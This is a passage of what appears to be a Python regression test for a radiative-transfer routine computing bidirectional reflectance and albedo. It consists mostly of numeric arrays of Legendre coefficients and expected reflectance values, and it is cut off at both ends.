0.42114657e-03,
0.41246001e-03,
0.40299704e-03,
0.39280354e-03,
0.38204770e-03,
0.37087622e-03,
0.35903638e-03,
0.34639766e-03,
0.33326566e-03,
0.31975409e-03,
0.30575541e-03,
0.29127134e-03,
0.27634719e-03,
0.26128866e-03,
0.24593511e-03,
0.23035664e-03,
0.21476793e-03,
0.19919084e-03,
0.18352638e-03,
0.16776577e-03,
0.15213400e-03,
0.13650597e-03,
0.12117127e-03,
0.10604783e-03,
0.91420814e-04,
0.77014876e-04,
0.63102707e-04,
0.49865157e-04,
0.36943147e-04,
0.24579298e-04,
0.12646942e-04,
0.93583714e-06,
-0.10726711e-04,
-0.22409520e-04,
-0.34169330e-04,
-0.46268411e-04,
-0.58847447e-04,
-0.71843184e-04,
-0.85561762e-04,
-0.99899378e-04,
-0.11538975e-03,
-0.13264996e-03,
-0.15311912e-03,
-0.17894371e-03,
-0.21519083e-03,
-0.27111307e-03,
-0.36378118e-03,
-0.52517361e-03,
-0.80816675e-03,
-0.12878858e-02,
-0.20363682e-02,
-0.30407030e-02,
-0.40585143e-02,
-0.45180605e-02,
-0.37541774e-02,
-0.16340034e-02,
0.92716783e-03,
0.24486976e-02,
0.22101640e-02,
0.82245702e-03,
-0.59355749e-03,
-0.14349412e-02,
-0.17818650e-02,
-0.19710022e-02,
-0.22550686e-02,
-0.27460111e-02,
-0.34975049e-02,
-0.45994679e-02,
-0.62465151e-02,
-0.86843111e-02,
-0.11772950e-01,
-0.14247025e-01,
-0.13897673e-01,
-0.95402114e-02,
-0.26456779e-02,
0.37637560e-02,
0.75113312e-02,
0.82785152e-02,
0.16024915e-03,
0.18166313e-03,
0.20833101e-03,
0.23556003e-03,
0.25996531e-03,
0.27946456e-03,
0.29345075e-03,
0.30254686e-03,
0.30792650e-03,
0.31066421e-03,
0.31148014e-03,
0.31080900e-03,
0.30893844e-03,
0.30608277e-03,
0.30241298e-03,
0.29805984e-03,
0.29311786e-03,
0.28767882e-03,
0.28175494e-03,
0.27529473e-03,
0.26832905e-03,
0.26097632e-03,
0.25335979e-03,
0.24527783e-03,
0.23663967e-03,
0.22766842e-03,
0.21843993e-03,
0.20887410e-03,
0.19898124e-03,
0.18877641e-03,
0.17849728e-03,
0.16801062e-03,
0.15736978e-03,
0.14671541e-03,
0.13608270e-03,
0.12537625e-03,
0.11459773e-03,
0.10394175e-03,
0.93250273e-04,
0.82784871e-04,
0.72433824e-04,
0.62449340e-04,
0.52622323e-04,
0.43097367e-04,
0.34058194e-04,
0.25217514e-04,
0.16786646e-04,
0.86424679e-05,
0.63486573e-06,
-0.73354054e-05,
-0.15307762e-04,
-0.23343211e-04,
-0.31608852e-04,
-0.40205730e-04,
-0.49073769e-04,
-0.58462469e-04,
-0.68241599e-04,
-0.78819096e-04,
-0.90594622e-04,
-0.10456181e-03,
-0.12214016e-03,
-0.14677636e-03,
-0.18476187e-03,
-0.24763195e-03,
-0.35712289e-03,
-0.54928858e-03,
-0.87579578e-03,
-0.13871513e-02,
-0.20772433e-02,
-0.27833104e-02,
-0.31113259e-02,
-0.25939168e-02,
-0.11258019e-02,
0.66039932e-03,
0.17193498e-02,
0.15396239e-02,
0.55894168e-03,
-0.42620959e-03,
-0.99759083e-03,
-0.12229718e-02,
-0.13435301e-02,
-0.15339972e-02,
-0.18679998e-02,
-0.23784370e-02,
-0.31225604e-02,
-0.42320755e-02,
-0.58987723e-02,
-0.81079528e-02,
-0.10059725e-01,
-0.10070107e-01,
-0.69461395e-02,
-0.15970924e-02,
0.35173711e-02,
0.64823525e-02,
0.69939806e-02,
0.58447313e-02,
0.99998928e-04,
0.11336149e-03,
0.13000234e-03,
0.14699313e-03,
0.16222145e-03,
0.17438777e-03,
0.18311353e-03,
0.18878833e-03,
0.19214548e-03,
0.19385564e-03,
0.19436714e-03,
0.19395056e-03,
0.19278521e-03,
0.19100346e-03,
0.18871219e-03,
0.18599514e-03,
0.18291226e-03,
0.17952279e-03,
0.17582905e-03,
0.17179834e-03,
0.16745202e-03,
0.16285951e-03,
0.15811202e-03,
0.15307403e-03,
0.14767774e-03,
0.14207418e-03,
0.13631718e-03,
0.13035099e-03,
0.12418116e-03,
0.11780974e-03,
0.11139606e-03,
0.10484913e-03,
0.98205564e-04,
0.91553651e-04,
0.84926301e-04,
0.78246710e-04,
0.71511990e-04,
0.64868305e-04,
0.58195605e-04,
0.51666491e-04,
0.45197361e-04,
0.38973347e-04,
0.32842243e-04,
0.26893933e-04,
0.21249898e-04,
0.15730866e-04,
0.10472757e-04,
0.53960257e-05,
0.39317513e-06,
-0.45791730e-05,
-0.95536843e-05,
-0.14566379e-04,
-0.19728041e-04,
-0.25091455e-04,
-0.30624815e-04,
-0.36488018e-04,
-0.42586758e-04,
-0.49185081e-04,
-0.56528501e-04,
-0.65242508e-04,
-0.76187855e-04,
-0.91523340e-04,
-0.11515653e-03,
-0.15424404e-03,
-0.22232164e-03,
-0.34186023e-03,
-0.54521387e-03,
-0.86433312e-03,
-0.12963127e-02,
-0.17405468e-02,
-0.19500151e-02,
-0.16286803e-02,
-0.70585759e-03,
0.42125979e-03,
0.10887617e-02,
0.97085984e-03,
0.34771912e-03,
-0.27306599e-03,
-0.62840234e-03,
-0.76508470e-03,
-0.83742116e-03,
-0.95511600e-03,
-0.11631359e-02,
-0.14807530e-02,
-0.19422875e-02,
-0.26292126e-02,
-0.36683388e-02,
-0.50780545e-02,
-0.63869823e-02,
-0.64897770e-02,
-0.44976156e-02,
-0.92731958e-03,
0.25404119e-02,
0.45405924e-02,
0.48503033e-02,
0.40294230e-02,
0.27683314e-02,
0.53884014e-04,
0.61084211e-04,
0.70050810e-04,
0.79205915e-04,
0.87411223e-04,
0.93966446e-04,
0.98667610e-04,
0.10172475e-03,
0.10353317e-03,
0.10445446e-03,
0.10473084e-03,
0.10450836e-03,
0.10388237e-03,
0.10292211e-03,
0.10168495e-03,
0.10021854e-03,
0.98558390e-04,
0.96735770e-04,
0.94745832e-04,
0.92573500e-04,
0.90232592e-04,
0.87755776e-04,
0.85199157e-04,
0.82488186e-04,
0.79575933e-04,
0.76551951e-04,
0.73451745e-04,
0.70241033e-04,
0.66919587e-04,
0.63485968e-04,
0.60029004e-04,
0.56497996e-04,
0.52914555e-04,
0.49328813e-04,
0.45763074e-04,
0.42167223e-04,
0.38533406e-04,
0.34952976e-04,
0.31360858e-04,
0.27841659e-04,
0.24351986e-04,
0.21002805e-04,
0.17696189e-04,
0.14492869e-04,
0.11447947e-04,
0.84757721e-05,
0.56412364e-05,
0.29090747e-05,
0.20986288e-06,
-0.24671158e-05,
-0.51494958e-05,
-0.78480261e-05,
-0.10632524e-04,
-0.13520086e-04,
-0.16503614e-04,
-0.19662311e-04,
-0.22948981e-04,
-0.26503118e-04,
-0.30458663e-04,
-0.35155379e-04,
-0.41044819e-04,
-0.49301310e-04,
-0.62018436e-04,
-0.83043000e-04,
-0.11966786e-03,
-0.18399033e-03,
-0.29346853e-03,
-0.46542627e-03,
-0.69852220e-03,
-0.93878357e-03,
-0.10528294e-02,
-0.88006578e-03,
-0.38117066e-03,
0.22924476e-03,
0.59057289e-03,
0.52561943e-03,
0.18708916e-03,
-0.14889365e-03,
-0.34005527e-03,
-0.41272707e-03,
-0.45099761e-03,
-0.51413663e-03,
-0.62613422e-03,
-0.79706579e-03,
-0.10450790e-02,
-0.14138672e-02,
-0.19733894e-02,
-0.27403242e-02,
-0.34682453e-02,
-0.35488785e-02,
-0.24659703e-02,
-0.48296375e-03,
0.14571503e-02,
0.25734871e-02,
0.27371510e-02,
0.22676513e-02,
0.15553402e-02,
0.87312493e-03,
0.21932714e-04,
0.24863417e-04,
0.28513090e-04,
0.32239484e-04,
0.35579265e-04,
0.38247381e-04,
0.40160809e-04,
0.41405037e-04,
0.42140975e-04,
0.42515869e-04,
0.42628493e-04,
0.42538381e-04,
0.42284017e-04,
0.41893109e-04,
0.41388936e-04,
0.40791474e-04,
0.40115974e-04,
0.39374940e-04,
0.38564984e-04,
0.37680649e-04,
0.36728081e-04,
0.35719502e-04,
0.34679109e-04,
0.33576438e-04,
0.32390075e-04,
0.31158215e-04,
0.29896764e-04,
0.28590852e-04,
0.27239597e-04,
0.25841982e-04,
0.24434608e-04,
0.22996630e-04,
0.21537227e-04,
0.20077452e-04,
0.18627210e-04,
0.17164399e-04,
0.15684327e-04,
0.14226660e-04,
0.12765439e-04,
0.11332698e-04,
0.99115950e-05,
0.85493384e-05,
0.72026537e-05,
0.58994046e-05,
0.46591872e-05,
0.34499117e-05,
0.22957561e-05,
0.11843766e-05,
0.84998014e-07,
-0.10040685e-05,
-0.20963864e-05,
-0.31941836e-05,
-0.43282666e-05,
-0.55030100e-05,
-0.67179099e-05,
-0.80033133e-05,
-0.93413128e-05,
-0.10787697e-04,
-0.12397514e-04,
-0.14309594e-04,
-0.16705344e-04,
-0.20065328e-04,
-0.25239178e-04,
-0.33791446e-04,
-0.48691152e-04,
-0.74860320e-04,
-0.11940804e-03,
-0.18940083e-03,
-0.28432420e-03,
-0.38224252e-03,
-0.42882701e-03,
-0.35856038e-03,
-0.15526464e-03,
0.93624702e-04,
0.24092782e-03,
0.21429047e-03,
0.76112388e-04,
-0.60849816e-04,
-0.13861567e-03,
-0.16805886e-03,
-0.18353794e-03,
-0.20919893e-03,
-0.25477342e-03,
-0.32431912e-03,
-0.42517454e-03,
-0.57509379e-03,
-0.80277218e-03,
-0.11159416e-02,
-0.14153966e-02,
-0.14518298e-02,
-0.10097986e-02,
-0.19427406e-03,
0.60561736e-03,
0.10654813e-02,
0.11315914e-02,
0.93659549e-03,
0.64201583e-03,
0.36030522e-03,
0.14866883e-03,
0.41634707e-05,
0.47198023e-05,
0.54126149e-05,
0.61199912e-05,
0.67539763e-05,
0.72604594e-05,
0.76236788e-05,
0.78598650e-05,
0.79995607e-05,
0.80707214e-05,
0.80921054e-05,
0.80750178e-05,
0.80267509e-05,
0.79525425e-05,
0.78568110e-05,
0.77433706e-05,
0.76151509e-05,
0.74745158e-05,
0.73207625e-05,
0.71528843e-05,
0.69720704e-05,
0.67805959e-05,
0.65831077e-05,
0.63738212e-05,
0.61485744e-05,
0.59146905e-05,
0.56752488e-05,
0.54273883e-05,
0.51709094e-05,
0.49056021e-05,
0.46384298e-05,
0.43654286e-05,
0.40883574e-05,
0.38112394e-05,
0.35359881e-05,
0.32583384e-05,
0.29773378e-05,
0.27006156e-05,
0.24232718e-05,
0.21512824e-05,
0.18814886e-05,
0.16229329e-05,
0.13672592e-05,
0.11198919e-05,
0.88442783e-06,
0.65489411e-06,
0.43578387e-06,
0.22484058e-06,
0.16117639e-07,
-0.19059540e-06,
-0.39797052e-06,
-0.60633920e-06,
-0.82165008e-06,
-0.10446255e-05,
-0.12752704e-05,
-0.15192638e-05,
-0.17732648e-05,
-0.20478196e-05,
-0.23534012e-05,
-0.27163851e-05,
-0.31711115e-05,
-0.38089131e-05,
-0.47909707e-05,
-0.64142382e-05,
-0.92423534e-05,
-0.14209581e-04,
-0.22665536e-04,
-0.35952206e-04,
-0.53973064e-04,
-0.72565315e-04,
-0.81414371e-04,
-0.68077694e-04,
-0.29477938e-04,
0.17784128e-04,
0.45754921e-04,
0.40691128e-04,
0.14446910e-04,
-0.11559983e-04,
-0.26320620e-04,
-0.31904819e-04,
-0.34839621e-04,
-0.39709423e-04,
-0.48360336e-04,
-0.61561077e-04,
-0.80702943e-04,
-0.10915505e-03,
-0.15237252e-03,
-0.21185735e-03,
-0.26881794e-03,
-0.27586648e-03,
-0.19191137e-03,
-0.36795147e-04,
0.11542100e-03,
0.20291690e-03,
0.21544744e-03,
0.17828873e-03,
0.12219916e-03,
0.68575428e-04,
0.28294970e-04,
0.53851386e-05,
]
)
return spherical_albedo, albedo, expected_r1
| 27.33128 | 77 | 0.43567 |
import numpy as np
from mishchenko_brf.lib.refl import brf
def test_brf():
    """Regression test for ``brf``.

    Runs ``brf`` on the stored single-scattering inputs from ``setup()`` and
    compares the spherical albedo, the plane albedo, and the first azimuthal
    Fourier component of the reflection matrix against the reference values
    stored in ``results()``.
    """
    ssalb, _, legendre = setup()
    # NOTE(review): setup() also returns the true coefficient count, but the
    # padded array length is what is passed here; the trailing zero padding is
    # presumably harmless — confirm against brf's contract.
    _, spherical_albedo, albedo, _, r = brf(ssalb, len(legendre), legendre)
    expected_spherical_albedo, expected_albedo, expected_r1 = results()
    # The expected spherical albedo was previously unpacked (under a typo'd
    # name) but never checked; assert it alongside the other outputs.
    np.testing.assert_allclose(
        spherical_albedo, expected_spherical_albedo, atol=1e-6, rtol=0
    )
    np.testing.assert_allclose(albedo, expected_albedo, atol=1e-6, rtol=0)
    # Flatten the lower triangle of the m=1 Fourier component row by row to
    # match the 1-D layout of the stored reference values.
    r1 = np.concatenate([r[1, i, : i + 1] for i in range(r.shape[1])])
    np.testing.assert_allclose(r1, expected_r1, atol=1e-5, rtol=0)
def setup():
    """Build the single-scattering inputs for the ``brf`` regression test.

    Returns:
        tuple: ``(ssalb, n_coef, coeffs)`` where ``ssalb`` is the
        single-scattering albedo, ``n_coef`` is the number of Legendre
        expansion coefficients actually supplied, and ``coeffs`` is the
        coefficient array zero-padded to length 700.
    """
    # Single-scattering albedo of the test case.
    ssalb = 0.85404045e00
    # Legendre expansion coefficients of the phase function; the zeroth
    # coefficient is normalised to 1.
    Legendre_coef = [
        0.1000000e01,
        0.2512562e01,
        0.3759305e01,
        0.4408389e01,
        0.5536463e01,
        0.6260982e01,
        0.7525636e01,
        0.8312788e01,
        0.9542491e01,
        0.1040885e02,
        0.1151645e02,
        0.1244280e02,
        0.1343854e02,
        0.1442002e02,
        0.1533074e02,
        0.1628946e02,
        0.1717182e02,
        0.1807816e02,
        0.1898665e02,
        0.1978204e02,
        0.2073036e02,
        0.2142049e02,
        0.2241713e02,
        0.2301598e02,
        0.2401247e02,
        0.2456069e02,
        0.2552589e02,
        0.2607232e02,
        0.2695832e02,
        0.2752722e02,
        0.2831653e02,
        0.2892665e02,
        0.2962000e02,
        0.3025463e02,
        0.3086891e02,
        0.3150598e02,
        0.3207453e02,
        0.3268248e02,
        0.3323146e02,
        0.3378450e02,
        0.3433640e02,
        0.3482245e02,
        0.3538333e02,
        0.3580127e02,
        0.3636525e02,
        0.3672771e02,
        0.3728034e02,
        0.3760455e02,
        0.3812729e02,
        0.3843143e02,
        0.3890899e02,
        0.3920687e02,
        0.3962926e02,
        0.3992750e02,
        0.4029233e02,
        0.4059085e02,
        0.4090206e02,
        0.4119521e02,
        0.4146075e02,
        0.4174035e02,
        0.4196960e02,
        0.4222747e02,
        0.4242858e02,
        0.4265858e02,
        0.4283710e02,
        0.4303618e02,
        0.4319451e02,
        0.4336267e02,
        0.4350045e02,
        0.4364008e02,
        0.4375514e02,
        0.4386992e02,
        0.4395939e02,
        0.4405318e02,
        0.4411450e02,
        0.4419058e02,
        0.4422209e02,
        0.4428264e02,
        0.4428387e02,
        0.4432995e02,
        0.4430155e02,
        0.4433324e02,
        0.4427669e02,
        0.4429349e02,
        0.4421068e02,
        0.4421187e02,
        0.4410481e02,
        0.4408970e02,
        0.4396023e02,
        0.4392847e02,
        0.4377812e02,
        0.4372965e02,
        0.4355963e02,
        0.4349478e02,
        0.4330600e02,
        0.4322534e02,
        0.4301853e02,
        0.4292279e02,
        0.4269857e02,
        0.4258853e02,
        0.4234756e02,
        0.4222396e02,
        0.4196694e02,
        0.4183048e02,
        0.4155822e02,
        0.4140946e02,
        0.4112286e02,
        0.4096230e02,
        0.4066235e02,
        0.4049042e02,
        0.4017813e02,
        0.3999523e02,
        0.3967166e02,
        0.3947818e02,
        0.3914435e02,
        0.3894071e02,
        0.3859761e02,
        0.3838426e02,
        0.3803282e02,
        0.3781024e02,
        0.3745135e02,
        0.3722008e02,
        0.3685457e02,
        0.3661513e02,
        0.3624382e02,
        0.3599677e02,
        0.3562045e02,
        0.3536629e02,
        0.3498576e02,
        0.3472502e02,
        0.3434105e02,
        0.3407421e02,
        0.3368756e02,
        0.3341511e02,
        0.3302651e02,
        0.3274894e02,
        0.3235911e02,
        0.3207689e02,
        0.3168649e02,
        0.3140011e02,
        0.3100977e02,
        0.3071973e02,
        0.3033004e02,
        0.3003681e02,
        0.2964833e02,
        0.2935240e02,
        0.2896567e02,
        0.2866749e02,
        0.2828303e02,
        0.2798304e02,
        0.2760134e02,
        0.2729996e02,
        0.2692148e02,
        0.2661913e02,
        0.2624432e02,
        0.2594138e02,
        0.2557065e02,
        0.2526752e02,
        0.2490123e02,
        0.2459831e02,
        0.2423680e02,
        0.2393445e02,
        0.2357803e02,
        0.2327663e02,
        0.2292556e02,
        0.2262546e02,
        0.2228000e02,
        0.2198153e02,
        0.2164193e02,
        0.2134540e02,
        0.2101185e02,
        0.2071756e02,
        0.2039027e02,
        0.2009849e02,
        0.1977763e02,
        0.1948862e02,
        0.1917433e02,
        0.1888834e02,
        0.1858075e02,
        0.1829802e02,
        0.1799722e02,
        0.1771798e02,
        0.1742405e02,
        0.1714851e02,
        0.1686151e02,
        0.1658986e02,
        0.1630983e02,
        0.1604226e02,
        0.1576923e02,
        0.1550590e02,
        0.1523988e02,
        0.1498093e02,
        0.1472193e02,
        0.1446749e02,
        0.1421550e02,
        0.1396569e02,
        0.1372068e02,
        0.1347561e02,
        0.1323754e02,
        0.1299730e02,
        0.1276613e02,
        0.1253080e02,
        0.1230645e02,
        0.1207611e02,
        0.1185852e02,
        0.1163322e02,
        0.1142231e02,
        0.1120210e02,
        0.1099778e02,
        0.1078270e02,
        0.1058487e02,
        0.1037494e02,
        0.1018351e02,
        0.9978738e01,
        0.9793600e01,
        0.9593997e01,
        0.9415044e01,
        0.9220600e01,
        0.9047715e01,
        0.8858418e01,
        0.8691482e01,
        0.8507312e01,
        0.8346198e01,
        0.8167129e01,
        0.8011710e01,
        0.7837708e01,
        0.7687854e01,
        0.7518876e01,
        0.7374456e01,
        0.7210453e01,
        0.7071336e01,
        0.6912254e01,
        0.6778307e01,
        0.6624084e01,
        0.6495174e01,
        0.6345745e01,
        0.6221738e01,
        0.6077033e01,
        0.5957794e01,
        0.5817740e01,
        0.5703134e01,
        0.5567654e01,
        0.5457548e01,
        0.5326563e01,
        0.5220821e01,
        0.5094248e01,
        0.4992739e01,
        0.4870492e01,
        0.4773085e01,
        0.4655075e01,
        0.4561642e01,
        0.4447778e01,
        0.4358190e01,
        0.4248381e01,
        0.4162514e01,
        0.4056666e01,
        0.3974395e01,
        0.3872413e01,
        0.3793618e01,
        0.3695406e01,
        0.3619966e01,
        0.3525429e01,
        0.3453228e01,
        0.3362271e01,
        0.3293193e01,
        0.3205718e01,
        0.3139651e01,
        0.3055564e01,
        0.2992397e01,
        0.2911601e01,
        0.2851228e01,
        0.2773628e01,
        0.2715944e01,
        0.2641446e01,
        0.2586348e01,
        0.2514857e01,
        0.2462248e01,
        0.2393671e01,
        0.2343453e01,
        0.2277698e01,
        0.2229778e01,
        0.2166754e01,
        0.2121041e01,
        0.2060659e01,
        0.2017065e01,
        0.1959237e01,
        0.1917674e01,
        0.1862314e01,
        0.1822700e01,
        0.1769722e01,
        0.1731977e01,
        0.1681298e01,
        0.1645344e01,
        0.1596882e01,
        0.1562643e01,
        0.1516319e01,
        0.1483723e01,
        0.1439458e01,
        0.1408435e01,
        0.1366152e01,
        0.1336633e01,
        0.1296260e01,
        0.1268180e01,
        0.1229642e01,
        0.1202937e01,
        0.1166165e01,
        0.1140775e01,
        0.1105699e01,
        0.1081566e01,
        0.1048119e01,
        0.1025186e01,
        0.9933033e00,
        0.9715168e00,
        0.9411347e00,
        0.9204422e00,
        0.8914999e00,
        0.8718511e00,
        0.8442892e00,
        0.8256361e00,
        0.7993970e00,
        0.7816934e00,
        0.7567216e00,
        0.7399231e00,
        0.7161648e00,
        0.7002287e00,
        0.6776319e00,
        0.6625175e00,
        0.6410319e00,
        0.6267001e00,
        0.6062772e00,
        0.5926905e00,
        0.5732835e00,
        0.5604061e00,
        0.5419698e00,
        0.5297674e00,
        0.5122584e00,
        0.5006981e00,
        0.4840745e00,
        0.4731249e00,
        0.4573463e00,
        0.4469774e00,
        0.4320051e00,
        0.4221882e00,
        0.4079849e00,
        0.3986924e00,
        0.3852225e00,
        0.3764283e00,
        0.3636572e00,
        0.3553362e00,
        0.3432310e00,
        0.3353594e00,
        0.3238883e00,
        0.3164434e00,
        0.3055761e00,
        0.2985361e00,
        0.2882435e00,
        0.2815877e00,
        0.2718419e00,
        0.2655505e00,
        0.2563248e00,
        0.2503791e00,
        0.2416479e00,
        0.2360299e00,
        0.2277687e00,
        0.2224615e00,
        0.2146470e00,
        0.2096341e00,
        0.2022440e00,
        0.1975101e00,
        0.1905229e00,
        0.1860533e00,
        0.1794487e00,
        0.1752294e00,
        0.1689879e00,
        0.1650056e00,
        0.1591086e00,
        0.1553506e00,
        0.1497804e00,
        0.1462348e00,
        0.1409744e00,
        0.1376297e00,
        0.1326632e00,
        0.1295086e00,
        0.1248204e00,
        0.1218456e00,
        0.1174212e00,
        0.1146165e00,
        0.1104419e00,
        0.1077980e00,
        0.1038600e00,
        0.1013680e00,
        0.9765404e-01,
        0.9530568e-01,
        0.9180371e-01,
        0.8959107e-01,
        0.8628968e-01,
        0.8420526e-01,
        0.8109362e-01,
        0.7913032e-01,
        0.7619812e-01,
        0.7434919e-01,
        0.7158666e-01,
        0.6984571e-01,
        0.6724356e-01,
        0.6560456e-01,
        0.6315396e-01,
        0.6161117e-01,
        0.5930377e-01,
        0.5785177e-01,
        0.5567961e-01,
        0.5431328e-01,
        0.5226885e-01,
        0.5098332e-01,
        0.4905947e-01,
        0.4785016e-01,
        0.4604013e-01,
        0.4490269e-01,
        0.4320006e-01,
        0.4213037e-01,
        0.4052908e-01,
        0.3952327e-01,
        0.3801755e-01,
        0.3707194e-01,
        0.3565637e-01,
        0.3476748e-01,
        0.3343689e-01,
        0.3260145e-01,
        0.3135097e-01,
        0.3056588e-01,
        0.2939089e-01,
        0.2865322e-01,
        0.2754936e-01,
        0.2685635e-01,
        0.2581950e-01,
        0.2516853e-01,
        0.2419479e-01,
        0.2358340e-01,
        0.2266910e-01,
        0.2209496e-01,
        0.2123660e-01,
        0.2069752e-01,
        0.1989183e-01,
        0.1938574e-01,
        0.1862960e-01,
        0.1815454e-01,
        0.1744504e-01,
        0.1699918e-01,
        0.1633353e-01,
        0.1591513e-01,
        0.1529073e-01,
        0.1489815e-01,
        0.1431255e-01,
        0.1394424e-01,
        0.1339511e-01,
        0.1304962e-01,
        0.1253477e-01,
        0.1221073e-01,
        0.1172810e-01,
        0.1142421e-01,
        0.1097185e-01,
        0.1068691e-01,
        0.1026299e-01,
        0.9995839e-02,
        0.9598632e-02,
        0.9348197e-02,
        0.8976075e-02,
        0.8741341e-02,
        0.8392774e-02,
        0.8172784e-02,
        0.7846332e-02,
        0.7640186e-02,
        0.7334491e-02,
        0.7141344e-02,
        0.6855129e-02,
        0.6674184e-02,
        0.6406246e-02,
        0.6236754e-02,
        0.5985964e-02,
        0.5827218e-02,
        0.5592512e-02,
        0.5443850e-02,
        0.5224227e-02,
        0.5085025e-02,
        0.4879544e-02,
        0.4749216e-02,
        0.4556995e-02,
        0.4434989e-02,
        0.4255197e-02,
        0.4140997e-02,
        0.3972854e-02,
        0.3865974e-02,
        0.3708747e-02,
        0.3608730e-02,
        0.3461733e-02,
        0.3368151e-02,
        0.3230736e-02,
        0.3143185e-02,
        0.3014746e-02,
        0.2932847e-02,
        0.2812813e-02,
        0.2736210e-02,
        0.2624045e-02,
        0.2552404e-02,
        0.2447605e-02,
        0.2380611e-02,
        0.2282708e-02,
        0.2220067e-02,
        0.2128618e-02,
        0.2070056e-02,
        0.1984648e-02,
        0.1929906e-02,
        0.1850152e-02,
        0.1798987e-02,
        0.1724522e-02,
        0.1676708e-02,
        0.1607190e-02,
        0.1562511e-02,
        0.1497620e-02,
        0.1455875e-02,
        0.1395308e-02,
        0.1356308e-02,
        0.1299785e-02,
        0.1263353e-02,
        0.1210611e-02,
        0.1176583e-02,
        0.1127375e-02,
        0.1095598e-02,
        0.1049696e-02,
        0.1020025e-02,
        0.9772121e-03,
        0.9495118e-03,
        0.9095846e-03,
        0.8837259e-03,
        0.8464937e-03,
        0.8223557e-03,
        0.7876397e-03,
        0.7651098e-03,
        0.7327438e-03,
        0.7117181e-03,
        0.6815480e-03,
        0.6619300e-03,
        0.6338120e-03,
        0.6155113e-03,
        0.5893102e-03,
        0.5722408e-03,
        0.5478283e-03,
        0.5319081e-03,
        0.5091634e-03,
        0.4943152e-03,
        0.4731258e-03,
        0.4592787e-03,
        0.4395410e-03,
        0.4266303e-03,
        0.4082493e-03,
        0.3962155e-03,
        0.3791019e-03,
        0.3678880e-03,
        0.3519565e-03,
        0.3415071e-03,
        0.3266762e-03,
        0.3169383e-03,
        0.3031319e-03,
        0.2940574e-03,
        0.2812067e-03,
        0.2727531e-03,
        0.2607960e-03,
        0.2529247e-03,
        0.2418025e-03,
        0.2344753e-03,
        0.2241307e-03,
        0.2173091e-03,
        0.2076865e-03,
        0.2013343e-03,
        0.1923831e-03,
        0.1864691e-03,
        0.1781456e-03,
        0.1726433e-03,
        0.1649075e-03,
        0.1597912e-03,
        0.1526032e-03,
        0.1478454e-03,
        0.1411648e-03,
        0.1367381e-03,
        0.1305278e-03,
        0.1264096e-03,
        0.1206392e-03,
        0.1168121e-03,
        0.1114548e-03,
        0.1079011e-03,
        0.1029286e-03,
        0.9962750e-04,
        0.9500928e-04,
        0.9194008e-04,
        0.8765030e-04,
        0.8479853e-04,
        0.8081775e-04,
        0.7817267e-04,
        0.7448255e-04,
        0.7203030e-04,
        0.6860758e-04,
        0.6633051e-04,
        0.6315326e-04,
        0.6103854e-04,
        0.5809158e-04,
        0.5613237e-04,
        0.5340456e-04,
        0.5159216e-04,
        0.4906537e-04,
        0.4738409e-04,
        0.4504024e-04,
        0.4348066e-04,
        0.4130949e-04,
        0.3986734e-04,
        0.3786116e-04,
        0.3653038e-04,
        0.3467413e-04,
        0.3343939e-04,
        0.3171734e-04,
        0.3057505e-04,
        0.2898660e-04,
        0.2793625e-04,
        0.2646920e-04,
        0.2549635e-04,
        0.2413735e-04,
        0.2323900e-04,
        0.2198645e-04,
        0.2116049e-04,
        0.2000504e-04,
        0.1924253e-04,
        0.1817554e-04,
        0.1747326e-04,
        0.1649066e-04,
        0.1584529e-04,
        0.1494019e-04,
        0.1434660e-04,
        0.1351308e-04,
        0.1296814e-04,
        0.1220153e-04,
        0.1170191e-04,
        0.1099720e-04,
        0.1053953e-04,
        0.9892289e-05,
    ]
    # Zero-pad the coefficients to length 700, which is the array size the
    # brf routine is called with in test_brf; also return the true count.
    return (
        ssalb,
        len(Legendre_coef),
        np.pad(Legendre_coef, (0, 700 - len(Legendre_coef))),
    )
def results():
spherical_albedo = 0.1400516239529828
albedo = [
0.57934552e00,
0.55945677e00,
0.53431237e00,
0.50788230e00,
0.48296762e00,
0.46127653e00,
0.44329438e00,
0.42849159e00,
0.41589457e00,
0.40462923e00,
0.39412692e00,
0.38407087e00,
0.37428829e00,
0.36468229e00,
0.35519615e00,
0.34579977e00,
0.33647874e00,
0.32722980e00,
0.31805637e00,
0.30896705e00,
0.29997292e00,
0.29108667e00,
0.28232241e00,
0.27369434e00,
0.26521713e00,
0.25690463e00,
0.24876949e00,
0.24082196e00,
0.23306957e00,
0.22551830e00,
0.21817389e00,
0.21104220e00,
0.20412904e00,
0.19744009e00,
0.19098036e00,
0.18475346e00,
0.17876221e00,
0.17300782e00,
0.16749054e00,
0.16220950e00,
0.15716265e00,
0.15234718e00,
0.14775957e00,
0.14339539e00,
0.13924994e00,
0.13531761e00,
0.13159263e00,
0.12806895e00,
0.12473993e00,
0.12159910e00,
0.11863959e00,
0.11585440e00,
0.11323670e00,
0.11077949e00,
0.10847593e00,
0.10631904e00,
0.10430222e00,
0.10241879e00,
0.10066233e00,
0.99026598e-01,
0.97505502e-01,
0.96093059e-01,
0.94783649e-01,
0.93571737e-01,
0.92452131e-01,
0.91419615e-01,
0.90469383e-01,
0.89596771e-01,
0.88797286e-01,
0.88066630e-01,
0.87400697e-01,
0.86795583e-01,
0.86247541e-01,
0.85752994e-01,
0.85308485e-01,
0.84910698e-01,
0.84556349e-01,
0.84242381e-01,
0.83965667e-01,
0.83723314e-01,
0.83512425e-01,
0.83330259e-01,
0.83174184e-01,
0.83041623e-01,
0.82930155e-01,
0.82837544e-01,
0.82761563e-01,
0.82700156e-01,
0.82651392e-01,
0.82613394e-01,
0.82584500e-01,
0.82563184e-01,
0.82548007e-01,
0.82537644e-01,
0.82530975e-01,
0.82526997e-01,
0.82524881e-01,
0.82523920e-01,
0.82523584e-01,
0.82523517e-01,
]
expected_r1 = np.array(
[
0.38368369e03,
0.25770578e03,
0.23945151e03,
0.16855780e03,
0.18244296e03,
0.16236093e03,
0.10911653e03,
0.12755070e03,
0.12647316e03,
0.10830920e03,
0.67582947e02,
0.83225288e02,
0.89081558e02,
0.82212189e02,
0.66570000e02,
0.39153576e02,
0.50326321e02,
0.57166462e02,
0.56031170e02,
0.47971886e02,
0.36434990e02,
0.21253523e02,
0.28237167e02,
0.33642113e02,
0.34688950e02,
0.31254200e02,
0.25037840e02,
0.18253815e02,
0.11248275e02,
0.15133494e02,
0.18625698e02,
0.20033745e02,
0.18957489e02,
0.16075739e02,
0.12519300e02,
0.92340946e01,
0.62269855e01,
0.82350597e01,
0.10240828e02,
0.11357998e02,
0.11247568e02,
0.10105079e02,
0.84183950e01,
0.66705170e01,
0.51578894e01,
0.37987945e01,
0.48435707e01,
0.59637489e01,
0.67243404e01,
0.69045143e01,
0.65221829e01,
0.57613211e01,
0.48524532e01,
0.39752564e01,
0.32225568e01,
